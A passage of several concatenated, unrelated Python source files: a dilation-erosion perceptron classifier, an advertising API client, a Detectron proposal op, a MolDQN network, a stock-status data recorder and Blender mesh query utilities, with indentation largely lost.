plt.contourf(xx, yy, Z, alpha = 0.1, cmap='plasma')
plt.contour(xx, yy, Z, colors=colors, linestyles = 'dashed')
plt.grid("True")
plt.xlabel("Variable %d" % ind[0])
plt.ylabel("Variable %d" % ind[1])
return sc
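# Hedged usage sketch: decision_boundary only needs its first argument to expose
# a .predict method, so a fitted scikit-learn classifier can be passed in place
# of self. The blobs dataset and LinearSVC below are assumptions chosen for the
# illustration, not models used elsewhere in this file.
def example_decision_boundary_plot():
    from sklearn.datasets import make_blobs
    from sklearn.svm import LinearSVC
    X, y = make_blobs(n_samples=200, centers=2, n_features=2, random_state=0)
    clf = LinearSVC().fit(X, y)
    decision_boundary(clf, X, y)
    plt.show()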
# ##################################################
# Ensemble (or Bagging) Transform
# ##################################################
class EnsembleTransform(TransformerMixin, BaseEstimator):
def __init__(self,ensemble):
self.ensemble = ensemble
def fit(self, X, y):
(self.ensemble).fit(X, y)
return self
def transform(self, X):
return np.vstack([clf.decision_function(X) for clf in (self.ensemble).estimators_]).T
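# Hedged sketch of the decision value that the DEP class below optimizes (see
# the ZposDil/ZposEro expressions and the beta loss in fit): a convex
# combination of a morphological dilation max(x + w) and erosion min(x + m).
# This standalone helper is for illustration only; the class's own
# decision_function remains the reference implementation.
def dep_decision_value(X, w, m, beta):
    X = np.atleast_2d(X)
    dilation = np.max(X + w, axis=1)  # dilation term, one value per sample
    erosion = np.min(X + m, axis=1)   # erosion term, one value per sample
    return beta * dilation + (1.0 - beta) * erosion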
# ##################################################
# Dilation-Erosion Perceptron with DCCP
# ##################################################
class DEP(BaseEstimator, ClassifierMixin):
def __init__(self, weighted = True, ref = "maximum", C = 1.e-2,
beta = None, beta_loss = "hinge", Split2Beta = False,
solver = cp.MOSEK, verbose = False):
self.verbose = verbose
self.solver = solver
self.weighted = weighted
self.ref = ref
self.C = C
self.beta = beta
self.beta_loss = beta_loss
self.Split2Beta = Split2Beta
def fit(self, X, y):
start_time = time.time()
# Check that X and y have correct shape
X, y = check_X_y(X, y)
# Store the classes seen during fit
self.classes_ = unique_labels(y)
if len(self.classes_)>2:
print("Dilation-Erosion Morphological Perceptron can be used for binary classification!")
return
if self.Split2Beta == True:
skf = StratifiedKFold(n_splits=3, shuffle=True)
WM_index, beta_index = next(iter(skf.split(X,y)))
X_WM, X_beta = X[WM_index], X[beta_index]
y_WM, y_beta = y[WM_index], y[beta_index]
else:
X_WM, X_beta = X, X
y_WM, y_beta = y, y
M, N = X_beta.shape
indPos = (y_WM == self.classes_[1])
Xpos = X_WM[indPos,:]
Xneg = X_WM[~indPos,:]
Mpos = Xpos.shape[0]
Mneg = Xneg.shape[0]
if self.weighted == True:
Lpos = 1/pairwise_distances(Xpos,[np.mean(Xpos,axis=0)],metric="euclidean").flatten()
Lneg = 1/pairwise_distances(Xneg,[np.mean(Xneg,axis=0)],metric="euclidean").flatten()
nuPos = Lpos/Lpos.max()
nuNeg = Lneg/Lneg.max()
else:
nuPos = np.ones((Mpos))
nuNeg = np.ones((Mneg))
# Solve DCCP problem for dilation
if self.ref == "mean":
ref = -np.mean(Xneg,axis=0).reshape((1,N))
elif self.ref == "maximum":
ref = -np.max(Xneg,axis=0).reshape((1,N))
elif self.ref == "minimum":
ref = -np.min(Xneg,axis=0).reshape((1,N))
else:
ref = np.zeros((1,N))
w = cp.Variable((1,N))
xiPos = cp.Variable((Mpos))
xiNeg = cp.Variable((Mneg))
lossDil = cp.sum(nuPos*cp.pos(xiPos))/Mpos+cp.sum(nuNeg*cp.pos(xiNeg))/Mneg+self.C*cp.norm(w-ref,1)
objectiveDil = cp.Minimize(lossDil)
ZposDil = cp.max(np.ones((Mpos,1))@w + Xpos, axis=1)
ZnegDil = cp.max(np.ones((Mneg,1))@w + Xneg, axis=1)
constraintsDil = [ZposDil >= -xiPos, ZnegDil <= xiNeg]
probDil = cp.Problem(objectiveDil,constraintsDil)
probDil.solve(solver=self.solver, method = 'dccp', verbose = self.verbose)
self.dil_ = (w.value).flatten()
# Solve DCCP problem for erosion
if self.ref == "mean":
ref = -np.mean(Xpos,axis=0).reshape((1,N))
elif self.ref == "maximum":
ref = -np.min(Xpos,axis=0).reshape((1,N))
elif self.ref == "minimum":
ref = -np.max(Xpos,axis=0).reshape((1,N))
else:
ref = np.zeros((1,N))
m = cp.Variable((1,N))
etaPos = cp.Variable((Mpos))
etaNeg = cp.Variable((Mneg))
lossEro = cp.sum(nuPos*cp.pos(etaPos))/Mpos+cp.sum(nuNeg*cp.pos(etaNeg))/Mneg+self.C*cp.norm(m-ref,1)
objectiveEro = cp.Minimize(lossEro)
ZposEro = cp.min(np.ones((Mpos,1))@m + Xpos, axis=1)
ZnegEro = cp.min(np.ones((Mneg,1))@m + Xneg, axis=1)
constraintsEro = [ZposEro >= -etaPos, ZnegEro <= etaNeg]
probEro = cp.Problem(objectiveEro,constraintsEro)
probEro.solve(solver=self.solver, method = 'dccp', verbose = self.verbose)
self.ero_ = (m.value).flatten()
# Fine tune beta
if self.beta is None:
beta = cp.Variable(nonneg=True)
beta.value = 0.5
if self.beta_loss == "squared_hinge":
# Squared Hinge Loss
lossBeta = cp.sum_squares(cp.pos(-cp.multiply(2*((y_beta == self.classes_[1]).astype(int))-1,
beta*cp.max(np.ones((M,1))@w.value + X_beta, axis=1) +
(1-beta)*cp.min(np.ones((M,1))@m.value + X_beta, axis=1))))
else:
# Hinge Loss
lossBeta = cp.sum(cp.pos(-cp.multiply(2*((y_beta == self.classes_[1]).astype(int))-1,
beta*cp.max(np.ones((M,1))@w.value + X_beta, axis=1) +
(1-beta)*cp.min(np.ones((M,1))@m.value + X_beta, axis=1))))
constraintsBeta = [beta<=1]
probBeta = cp.Problem(cp.Minimize(lossBeta),constraintsBeta)
probBeta.solve(solver = cp.SCS, verbose = self.verbose, warm_start=True)
self.beta = beta.value
if self.verbose == True:
print("\nTime to train: %2.2f seconds." % (time.time() - start_time))
return self
def decision_function(self, X):
# Check that fit has been called
check_is_fitted(self,attributes="dil_")
# Input validation
X = check_array(X)
M,N = X.shape
Y = np.zeros((M,2))
# Compute the dilation
Y[:,0] = np.amax(np.ones((M,1))@self.dil_.reshape((1,N))+X,axis=1)
# Compute the erosion
Y[:,1] = np.amin(np.ones((M,1))@self.ero_.reshape((1,N))+X,axis=1)
return np.dot(Y,np.array([self.beta,1-self.beta]))
def predict(self, X):
return np.array([self.classes_[(y>=0).astype(int)] for y in self.decision_function(X)])
def show(self, X, y, ind=[0,1], show_boxes = True, decision_boundary = True, Nh = 101):
# Check that X and y have correct shape
X, y = check_X_y(X, y)
# Check that fit has been called
check_is_fitted(self,attributes="dil_")
plt.figure(figsize=(10, 8))
# Scatter plot
sc = plt.scatter(X[:,ind[0]], X[:,ind[1]], c = y.astype(int))
xlimits = plt.xlim()
ylimits = plt.ylim()
if decision_boundary:
if X.shape[1]>2:
print("Dimension larger than two! Cannot show the decision boundary!")
else:
# create a mesh to plot in
x_min, x_max = xlimits[0], xlimits[1]
y_min, y_max = ylimits[0], ylimits[1]
hx = (x_max-x_min)/Nh
hy = (y_max-y_min)/Nh
xx, yy = np.meshgrid(np.arange(x_min, x_max, hx),np.arange(y_min, y_max, hy))
# Plot the decision boundary. For that, we will assign a color to each
# point in the mesh [x_min, x_max]x[y_min, y_max].
Z = np.array(self.predict(np.c_[xx.ravel(), yy.ravel()]))
Z = Z.reshape(xx.shape)
# Put the result into a color plot
plt.contourf(xx, yy, Z, alpha = 0.1, cmap='plasma')
plt.contour(xx, yy, Z, colors='black', linestyles = 'dashed')
if show_boxes:
# Draw dilation box
box = [-1000*np.ones((X.shape[1],)),-self.dil_]
Vertices = np.array([box[0][ind],[box[1][ind[0]],box[0][ind[1]]],box[1][ind],[box[0][ind[0]],box[1][ind[1]]]])
plt.gca().add_patch(Polygon(Vertices, alpha = 0.3, color=sc.to_rgba(0)))
# Draw erosion box
box = [-self.ero_,1000*np.ones((X.shape[1],))]
Vertices = np.array([box[0][ind],[box[1][ind[0]],box[0][ind[1]]],box[1][ind],[box[0][ind[0]],box[1][ind[1]]]])
plt.gca().add_patch(Polygon(Vertices, alpha = 0.3, color=sc.to_rgba(1)))
plt.grid(True)
plt.xlabel("Variable %d" % ind[0])
plt.ylabel("Variable %d" % ind[1])
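# ##################################################
# Hedged usage sketch (not part of the original file)
# ##################################################
# The demo below fits the Dilation-Erosion Perceptron on a toy two-class problem. The
# data, the choice of cp.ECOS (an open solver, since the class default cp.MOSEK needs a
# licence) and the plotting calls are all assumptions for illustration.
def _demo_dep():
    from sklearn.datasets import make_blobs
    X_demo, y_demo = make_blobs(n_samples=100, centers=2, n_features=2, random_state=0)
    clf = DEP(C=1e-2, solver=cp.ECOS, verbose=False)
    clf.fit(X_demo, y_demo)
    print("Training accuracy: %.3f" % clf.score(X_demo, y_demo))
    clf.show(X_demo, y_demo)   # decision boundary and morphological boxes (2-D data only)
    plt.show()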
|
from nevada.Common.Connector import *
from typing import List
import jsonpickle
import json
class AdFieldObject:
def __init__(self, json_def=None):
if type(json_def) is str:
json_def = json.loads(json_def)
s = json_def
self.pc_display = None if 'pc' not in s else self.pc_display_easy(s['pc'])
self.pc_final = None if 'pc' not in s else self.pc_final_easy(s['pc'])
self.mobile_display = None if 'mobile' not in s else self.mobile_display_easy(s['mobile'])
self.mobile_final = None if 'mobile' not in s else self.mobile_final_easy(s['mobile'])
self.headline = None if 'headline' not in s else s['headline']
self.description = None if 'description' not in s else s['description']
def pc_final_easy(self, pc):
return pc['final']
def pc_display_easy(self, pc):
return pc['display']
def mobile_final_easy(self, mobile):
return mobile['final']
def mobile_display_easy(self, mobile):
return mobile['display']
class UpdateAdObject:
def __init__(self, adAttr, nccAdId, inspectRequestMsg=None, userLock = None):
self.adAttr = adAttr
self.inspectRequestMsg = inspectRequestMsg
self.nccAdId = nccAdId
self.userLock = userLock
class CreateAdObject:
def __init__(self, adObject, nccAdgroupId, type, inspectRequestMsg=None, userLock=None):
self.ad = adObject
self.inspectRequestMsg = inspectRequestMsg
self.nccAdgroupId = nccAdgroupId
self.type = type
self.userLock = userLock
class AdObject:
def __init__(self, json_def):
if type(json_def) is str:
json_def = json.loads(json_def)
s = json_def
self.ad = None if 'ad' not in s else AdFieldObject(s['ad'])
self.adattr = None if 'adattr' not in s else s['adattr']
self.customerId = None if 'customerId' not in s else s['customerId']
self.editTm = None if 'editTm' not in s else s['editTm']
self.inspectRequestMsg = None if 'inspectRequestMsg' not in s else s['inspectRequestMsg']
self.inspectStatus = None if 'inspectStatus' not in s else s['inspectStatus']
self.nccAdId = None if 'nccAdId' not in s else s['nccAdId']
self.nccAdgroupId = None if 'nccAdgroupId' not in s else s['nccAdgroupId']
self.regTm = None if 'regTm' not in s else s['regTm']
self.status = None if 'status' not in s else s['status']
self.statusReason = None if 'statusReason' not in s else s['statusReason']
self.type = None if 'type' not in s else s['type']
self.userLock = None if 'userLock' not in s else s['userLock']
class Ad:
def __init__(self, base_url: str, api_key: str, secret_key: str, customer_id: int):
self.conn = Connector(base_url, api_key, secret_key, customer_id)
AdIdList = List[str]
AdObjectList = List[AdObject]
ChangeFieldsList = List[str]
def get(self, adId: str) -> AdObject:
result = self.conn.get('/ncc/ads/' + adId)
return result
def list_by_adgroup_id(self, nccAdGroupId: str) -> AdObjectList:
result = self.conn.get('/ncc/ads', {'nccAdgroupId': nccAdGroupId})
return result
def list(self, ids: AdIdList) -> AdObjectList:
ids = ",".join(ids)
ids = {'ids': ids}
result = self.conn.get('/ncc/ads', ids)
return result
def create(self, adObject, nccAdgroupId, type, inspectRequestMsg, userLock) -> AdObject:
data = jsonpickle.encode(CreateAdObject(adObject, nccAdgroupId, type, inspectRequestMsg, userLock), unpicklable=False)
data = json.loads(data)
data = CommonFunctions.dropna(data)
data_str = json.dumps(data)
result = self.conn.post('/ncc/ads', data_str)
return result
def update(self, adId: str, fields: ChangeFieldsList, adAttr, inspectRequestMsg, nccAdId, userLock) -> AdObject:
change_fields_list = ",".join(fields)
query = {'fields': change_fields_list}
data = jsonpickle.encode(UpdateAdObject(adAttr=adAttr, inspectRequestMsg=inspectRequestMsg, nccAdId=nccAdId, userLock=userLock), unpicklable=False)
data = json.loads(data)
data = CommonFunctions.dropna(data)
data_str = json.dumps(data)
result = self.conn.put('/ncc/ads/' + adId, data_str, query)
return result
def delete(self, adId: str):
self.conn.delete('/ncc/ads/' + adId)
return True
def copy(self, adId: str, targetAdGroupId: str, userLock: bool) -> AdObject:
query = {'ids': adId, 'targetAdgroupId': targetAdGroupId, 'userLock': userLock}
result = self.conn.put('/ncc/ads', None, query)
return result
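# Hedged usage sketch (not part of the original module): the base URL, keys, customer id
# and adgroup id below are placeholders; the call simply exercises the methods defined above.
def _demo_ad_api():
    ad_api = Ad(base_url="<BASE_URL>", api_key="<API_KEY>",
                secret_key="<SECRET_KEY>", customer_id=0)
    ads = ad_api.list_by_adgroup_id("<NCC_ADGROUP_ID>")
    print(ads)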
|
# Copyright (c) 2017-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
from detectron.core.config import cfg
from detectron.datasets import json_dataset
import detectron.modeling.FPN as fpn
import detectron.roi_data.cascade_rcnn as cascade_rcnn_roi_data
import detectron.utils.blob as blob_utils
class DistributeCascadeProposalsOp(object):
def __init__(self, train, stage):
self._train = train
self._stage = stage
def forward(self, inputs, outputs):
"""See modeling.detector.DistributeCascadeProposals for
inputs/outputs documentation.
"""
rois = inputs[0].data
if self._train:
# During training we reuse the data loader code. We populate roidb
# entries on the fly using the rois generated by RPN.
# im_info: [[im_height, im_width, im_scale], ...]
roidb = blob_utils.deserialize(inputs[1].data)
im_info = inputs[2].data
im_scales = im_info[:, 2]
# For historical consistency with the original Faster R-CNN
# implementation we are *not* filtering crowd proposals.
# This choice should be investigated in the future (it likely does
# not matter).
json_dataset.add_proposals(roidb, rois, im_scales, crowd_thresh=0)
# Compute training labels for the RPN proposals; also handles
# distributing the proposals over FPN levels
output_blob_names = cascade_rcnn_roi_data.get_cascade_rcnn_blob_names(
self._stage
)
blobs = {k: [] for k in output_blob_names}
# Map the RoIs onto the appropriate FPN levels and re-sample them to build the training blobs
cascade_rcnn_roi_data.add_cascade_rcnn_blobs(
blobs, im_scales, roidb, self._stage
)
for i, k in enumerate(output_blob_names):
blob_utils.py_op_copy_blob(blobs[k], outputs[i])
else:
# For inference we have a special code path that avoids some data
# loader overhead
distribute(rois, None, outputs, self._train)
def distribute(rois, label_blobs, outputs, train):
"""To understand the output blob order see return value of
roi_data.cascade_rcnn.get_cascade_rcnn_blob_names(is_training=False)
"""
lvl_min = cfg.FPN.ROI_MIN_LEVEL
lvl_max = cfg.FPN.ROI_MAX_LEVEL
lvls = fpn.map_rois_to_fpn_levels(rois[:, 1:5], lvl_min, lvl_max)
outputs[0].reshape(rois.shape)
outputs[0].data[...] = rois
# Create new roi blobs for each FPN level
# (See: modeling.FPN.add_multilevel_roi_blobs which is similar but annoying
# to generalize to support this particular case.)
rois_idx_order = np.empty((0,))
for output_idx, lvl in enumerate(range(lvl_min, lvl_max + 1)):
idx_lvl = np.where(lvls == lvl)[0]
blob_roi_level = rois[idx_lvl, :]
outputs[output_idx + 1].reshape(blob_roi_level.shape)
outputs[output_idx + 1].data[...] = blob_roi_level
rois_idx_order = np.concatenate((rois_idx_order, idx_lvl))
rois_idx_restore = np.argsort(rois_idx_order)
blob_utils.py_op_copy_blob(rois_idx_restore.astype(np.int32), outputs[-1])
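# Hedged illustration (not part of the original file): map_rois_to_fpn_levels follows the
# FPN paper heuristic k = floor(k0 + log2(sqrt(w*h)/s)), clamped to [lvl_min, lvl_max],
# with canonical level k0 = 4 and canonical scale s = 224 as the usual defaults. The
# standalone sketch below reproduces that rule in plain NumPy under those assumed defaults.
def _fpn_level_for_rois(rois_xyxy, lvl_min=2, lvl_max=5, canonical_scale=224, canonical_level=4):
    """rois_xyxy: (N, 4) array of [x1, y1, x2, y2] boxes."""
    w = rois_xyxy[:, 2] - rois_xyxy[:, 0] + 1
    h = rois_xyxy[:, 3] - rois_xyxy[:, 1] + 1
    lvls = np.floor(canonical_level + np.log2(np.sqrt(w * h) / canonical_scale + 1e-6))
    return np.clip(lvls, lvl_min, lvl_max).astype(np.int32)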
|
import torch
import torch.nn as nn
import torch.nn.functional as F
class MolDQN(nn.Module):
def __init__(self, input_length, output_length):
super(MolDQN, self).__init__()
self.linear_1 = nn.Linear(input_length, 1024)
self.linear_2 = nn.Linear(1024, 512)
self.linear_3 = nn.Linear(512, 128)
self.linear_4 = nn.Linear(128, 32)
self.linear_5 = nn.Linear(32, output_length)
self.activation = nn.ReLU()
def forward(self, x):
x = self.activation(self.linear_1(x))
x = self.activation(self.linear_2(x))
x = self.activation(self.linear_3(x))
x = self.activation(self.linear_4(x))
x = self.linear_5(x)
return x
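# Hedged usage sketch (not part of the original file): the fingerprint length and batch
# size are arbitrary assumptions, shown only to illustrate the expected tensor shapes.
if __name__ == "__main__":
    net = MolDQN(input_length=2048, output_length=1)
    fingerprints = torch.randn(4, 2048)   # batch of 4 molecule fingerprints
    q_values = net(fingerprints)          # -> shape (4, 1)
    print(q_values.shape)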
|
# -*- coding: utf-8 -*-
import pandas as pd
from jqdatasdk import auth, logout, finance, query
from zvt.recorders.joinquant.common import to_jq_entity_id
from zvt import zvt_env
from zvt.api import TIME_FORMAT_DAY, get_str_schema
from zvt.contract.api import df_to_db
from zvt.contract.recorder import TimeSeriesDataRecorder
from zvt.domain import StockDetail,StockStatus
from zvt.utils.pd_utils import pd_is_not_null
from zvt.utils.time_utils import now_pd_timestamp, to_time_str
class JqChinaStockStatusRecorder(TimeSeriesDataRecorder):
entity_provider = 'joinquant'
entity_schema = StockDetail
# Data comes from JoinQuant (jq)
provider = 'joinquant'
data_schema = StockStatus
def __init__(self, entity_type='stock', exchanges=['sh', 'sz'], entity_ids=None, codes=None, batch_size=10,
force_update=False, sleeping_time=5, default_size=2000, real_time=False,
fix_duplicate_way='add', start_timestamp=None, end_timestamp=None, close_hour=0,
close_minute=0) -> None:
self.data_schema = StockStatus
super().__init__(entity_type, exchanges, entity_ids, codes, batch_size, force_update, sleeping_time,
default_size, real_time, fix_duplicate_way, start_timestamp, end_timestamp, close_hour,
close_minute)
# Call the JoinQuant login function (for an activated account; credentials are read from zvt_env)
auth(zvt_env['jq_username'], zvt_env['jq_password'])
def on_finish(self):
super().on_finish()
logout()
def record(self, entity, start, end, size, timestamps):
if not end:
end = to_time_str(now_pd_timestamp())
start = to_time_str(start)
q = query(finance.STK_STATUS_CHANGE).filter(
finance.STK_STATUS_CHANGE.code == to_jq_entity_id(entity)).filter(
finance.STK_STATUS_CHANGE.pub_date >= to_time_str(start)).limit(10)
df = finance.run_query(q)
if pd_is_not_null(df):
df['pub_date'] = pd.to_datetime(df['pub_date'])
df['exchange'] = entity.exchange
df['entity_type'] = entity.entity_type
df['change_date'] = pd.to_datetime(df['change_date'])
df['timestamp'] = df['change_date']
df['entity_id'] = entity.id
df['provider'] = 'joinquant'
df['code'] = entity.code
def generate_finance_id(se):
return "{}_{}".format(se['entity_id'], to_time_str(se['timestamp'], fmt=TIME_FORMAT_DAY))
df['id'] = df[['entity_id', 'timestamp']].apply(generate_finance_id, axis=1)
df_to_db(df=df, data_schema=self.data_schema, provider=self.provider, force_update=self.force_update)
return None
__all__ = ['JqChinaStockStatusRecorder']
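# Hedged usage sketch (not part of the original file): this assumes JoinQuant credentials
# are configured in zvt_env and that the TimeSeriesDataRecorder base class exposes the
# usual zvt run() entry point; the stock code is a placeholder.
if __name__ == '__main__':
    JqChinaStockStatusRecorder(codes=['000338']).run()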
|
import time
import math
import bpy
import bmesh
import bgl
from typing import List, Callable
from mathutils import Vector, Matrix, Color, kdtree
from mathutils.bvhtree import BVHTree
from mathutils.geometry import intersect_point_line, intersect_line_plane, intersect_point_tri
from bpy_extras import view3d_utils
from .maths import Point, Normal, XForm, Ray, Vector, Point2D
class XMesh:
def __init__(self, obj, triangulate=True):
self.obj = obj
self.xform = XForm(self.obj.matrix_world)
eme = self.obj.to_mesh(scene=bpy.context.scene, apply_modifiers=True, settings='PREVIEW')
eme.update()
self.bme = bmesh.new()
self.bme.from_mesh(eme)
if triangulate: self.triangulate()
self.dirty()
def dirty(self):
self._dirty = True
def clean(self):
if not self._dirty: return
self.bme.verts.ensure_lookup_table()
self.bme.edges.ensure_lookup_table()
self.bme.faces.ensure_lookup_table()
self._bvh = BVHTree.FromBMesh(self.bme)
self._dirty = False
###################################################################################
# properties
###################################################################################
@property
def bvh(self):
self.clean()
return self._bvh
###################################################################################
# simple manipulations
###################################################################################
def triangulate(self):
faces = [face for face in self.bme.faces if len(face.verts) != 3]
#print('%d non-triangles' % len(faces))
bmesh.ops.triangulate(self.bme, faces=faces)
self.dirty()
###################################################################################
# ray casting functions
###################################################################################
def raycast(self, ray:Ray):
ray_local = self.xform.w2l_ray(ray)
p,n,i,d = self.bvh.ray_cast(ray_local.o, ray_local.d, ray_local.max)
if p is None: return (None,None,None,None)
if not self.get_bbox().Point_within(p, margin=1):
return (None,None,None,None)
p_w,n_w = self.xform.l2w_point(p), self.xform.l2w_normal(n)
d_w = (ray.o - p_w).length
return (p_w,n_w,i,d_w)
def raycast_all(self, ray:Ray):
l2w_point,l2w_normal = self.xform.l2w_point,self.xform.l2w_normal
ray_local = self.xform.w2l_ray(ray)
hits = []
origin,direction,maxdist = ray_local.o,ray_local.d,ray_local.max
dist = 0
while True:
p,n,i,d = self.bvh.ray_cast(origin, direction, maxdist)
if not p: break
p,n = l2w_point(p),l2w_normal(n)
d = (origin - p).length
dist += d
hits += [(p,n,i,dist)]
origin += direction * (d + 0.00001)
maxdist -= d
return hits
def raycast_hit(self, ray:Ray):
ray_local = self.xform.w2l_ray(ray)
p,n,i,d = self.bvh.ray_cast(ray_local.o, ray_local.d, ray_local.max)
return p is not None
###################################################################################
# nearest functions
###################################################################################
def nearest(self, point:Point, max_dist=float('inf')): #sys.float_info.max):
point_local = self.xform.w2l_point(point)
p,n,i,_ = self.bvh.find_nearest(point_local, max_dist)
if p is None: return (None,None,None,None)
p,n = self.xform.l2w_point(p), self.xform.l2w_normal(n)
d = (point - p).length
return (p,n,i,d)
def nearest_bmvert_Point(self, point:Point, verts=None):
if verts is None:
verts = self.bme.verts
else:
verts = [self._unwrap(bmv) for bmv in verts]
point_local = self.xform.w2l_point(point)
bv,bd = None,None
for bmv in verts:
d3d = (bmv.co - point_local).length
if bv is None or d3d < bd: bv,bd = bmv,d3d
bmv_world = self.xform.l2w_point(bv.co)
return (self._wrap_bmvert(bv),(point-bmv_world).length)
def nearest_bmverts_Point(self, point:Point, dist3d:float):
nearest = []
for bmv in self.bme.verts:
bmv_world = self.xform.l2w_point(bmv.co)
d3d = (bmv_world - point).length
if d3d > dist3d: continue
nearest += [(self._wrap_bmvert(bmv), d3d)]
return nearest
def nearest_bmedge_Point(self, point:Point, edges=None):
if edges is None:
edges = self.bme.edges
else:
edges = [self._unwrap(bme) for bme in edges]
l2w_point = self.xform.l2w_point
be,bd,bpp = None,None,None
for bme in edges:
bmv0,bmv1 = l2w_point(bme.verts[0].co), l2w_point(bme.verts[1].co)
diff = bmv1 - bmv0
l = diff.length
d = diff / l
pp = bmv0 + d * max(0, min(l, (point - bmv0).dot(d)))
dist = (point - pp).length
if be is None or dist < bd: be,bd,bpp = bme,dist,pp
if be is None: return (None,None)
return (self._wrap_bmedge(be), (point-self.xform.l2w_point(bpp)).length)
def nearest_bmedges_Point(self, point:Point, dist3d:float):
l2w_point = self.xform.l2w_point
nearest = []
for bme in self.bme.edges:
bmv0,bmv1 = l2w_point(bme.verts[0].co), l2w_point(bme.verts[1].co)
diff = bmv1 - bmv0
l = diff.length
d = diff / l
pp = bmv0 + d * max(0, min(l, (point - bmv0).dot(d)))
dist = (point - pp).length
if dist > dist3d: continue
nearest += [(self._wrap_bmedge(bme), dist)]
return nearest
def nearest2D_bmverts_Point2D(self, xy:Point2D, dist2D:float, Point_to_Point2D, verts=None):
# TODO: compute distance from camera to point
# TODO: sort points based on 3d distance
if verts is None:
verts = self.bme.verts
else:
verts = [self._unwrap(bmv) for bmv in verts]
nearest = []
for bmv in verts:
p2d = Point_to_Point2D(self.xform.l2w_point(bmv.co))
if p2d is None: continue
if (p2d - xy).length > dist2D: continue
d3d = 0
nearest += [(self._wrap_bmvert(bmv), d3d)]
return nearest
def nearest2D_bmvert_Point2D(self, xy:Point2D, Point_to_Point2D, verts=None, max_dist=None):
if not max_dist or max_dist < 0: max_dist = float('inf')
# TODO: compute distance from camera to point
# TODO: sort points based on 3d distance
if verts is None:
verts = self.bme.verts
else:
verts = [self._unwrap(bmv) for bmv in verts]
l2w_point = self.xform.l2w_point
bv,bd = None,None
for bmv in verts:
p2d = Point_to_Point2D(l2w_point(bmv.co))
if p2d is None: continue
d2d = (xy - p2d).length
if d2d > max_dist: continue
if bv is None or d2d < bd: bv,bd = bmv,d2d
if bv is None: return (None,None)
return (self._wrap_bmvert(bv),bd)
def nearest2D_bmedges_Point2D(self, xy:Point2D, dist2D:float, Point_to_Point2D, edges=None, shorten=0.01):
# TODO: compute distance from camera to point
# TODO: sort points based on 3d distance
edges = self.bme.edges if edges is None else [self._unwrap(bme) for bme in edges]
l2w_point = self.xform.l2w_point
nearest = []
dist2D2 = dist2D**2
s0,s1 = shorten/2,1-shorten/2
proj = lambda bmv: Point_to_Point2D(l2w_point(bmv.co))
for bme in edges:
v0,v1 = proj(bme.verts[0]),proj(bme.verts[1])
l = v0.distance_to(v1)
if l == 0:
pp = v0
else:
d = (v1 - v0) / l
pp = v0 + d * max(l*s0, min(l*s1, d.dot(xy-v0)))
dist2 = pp.distance_squared_to(xy)
if dist2 > dist2D2: continue
nearest.append((self._wrap_bmedge(bme), math.sqrt(dist2)))
return nearest
def nearest2D_bmedge_Point2D(self, xy:Point2D, Point_to_Point2D, edges=None, shorten=0.01, max_dist=None):
if not max_dist or max_dist < 0: max_dist = float('inf')
if edges is None:
edges = self.bme.edges
else:
edges = [self._unwrap(bme) for bme in edges]
l2w_point = self.xform.l2w_point
be,bd,bpp = None,None,None
for bme in edges:
bmv0 = Point_to_Point2D(l2w_point(bme.verts[0].co))
bmv1 = Point_to_Point2D(l2w_point(bme.verts[1].co))
diff = bmv1 - bmv0
l = diff.length
if l == 0:
dist = (xy - bmv0).length
else:
d = diff / l
margin = l * shorten / 2
pp = bmv0 + d * max(margin, min(l-margin, (xy - bmv0).dot(d)))
dist = (xy - pp).length
if dist > max_dist: continue
if be is None or dist < bd: be,bd,bpp = bme,dist,pp
if be is None: return (None,None)
return (self._wrap_bmedge(be), (xy-bpp).length)
def nearest2D_bmfaces_Point2D(self, xy:Point2D, Point_to_Point2D, faces=None):
# TODO: compute distance from camera to point
# TODO: sort points based on 3d distance
if faces is None:
faces = self.bme.faces
else:
faces = [self._unwrap(bmf) for bmf in faces]
nearest = []
for bmf in faces:
pts = [Point_to_Point2D(self.xform.l2w_point(bmv.co)) for bmv in bmf.verts]
pts = [pt for pt in pts if pt]
if len(pts) < 3: continue
pt0 = pts[0]
# TODO: compute an actual 2D distance; 0 is a placeholder, matching nearest2D_bmverts_Point2D
dist = 0
for pt1,pt2 in zip(pts[1:-1],pts[2:]):
if intersect_point_tri(xy, pt0, pt1, pt2):
nearest += [(self._wrap_bmface(bmf), dist)]
#p2d = Point_to_Point2D(self.xform.l2w_point(bmv.co))
#d2d = (xy - p2d).length
#if p2d is None: continue
#if bv is None or d2d < bd: bv,bd = bmv,d2d
#if bv is None: return (None,None)
#return (self._wrap_bmvert(bv),bd)
return nearest
def nearest2D_bmface_Point2D(self, xy:Point2D, Point_to_Point2D, faces=None):
# TODO: compute distance from camera to point
# TODO: sort points based on 3d distance
if faces is None:
faces = self.bme.faces
else:
faces = [self._unwrap(bmf) for bmf in faces]
bv,bd = None,None
for bmf in faces:
pts = [Point_to_Point2D(self.xform.l2w_point(bmv.co)) for bmv in bmf.verts]
pts = [pt for pt in pts if pt]
if len(pts) < 3: continue
pt0 = pts[0]
for pt1,pt2 in zip(pts[1:-1],pts[2:]):
if intersect_point_tri(xy, pt0, pt1, pt2):
return self._wrap_bmface(bmf)
#p2d = Point_to_Point2D(self.xform.l2w_point(bmv.co))
#d2d = (xy - p2d).length
#if p2d is None: continue
#if bv is None or d2d < bd: bv,bd = bmv,d2d
#if bv is None: return (None,None)
#return (self._wrap_bmvert(bv),bd)
return None
##########################################################
def _visible_verts(self, is_visible:Callable[[Point,Normal], bool]):
l2w_point, l2w_normal = self.xform.l2w_point, self.xform.l2w_normal
#is_vis = lambda bmv: is_visible(l2w_point(bmv.co), l2w_normal(bmv.normal))
is_vis = lambda bmv: is_visible(l2w_point(bmv.co), None)
return { bmv for bmv in self.bme.verts if is_vis(bmv) }
def _visible_edges(self, is_visible, bmvs=None):
if bmvs is None: bmvs = self._visible_verts(is_visible)
return { bme for bme in self.bme.edges if all(bmv in bmvs for bmv in bme.verts) }
def _visible_faces(self, is_visible, bmvs=None):
if bmvs is None: bmvs = self._visible_verts(is_visible)
return { bmf for bmf in self.bme.faces if all(bmv in bmvs for bmv in bmf.verts) }
def visible_verts(self, is_visible):
return { self._wrap_bmvert(bmv) for bmv in self._visible_verts(is_visible) }
def visible_edges(self, is_visible, verts=None):
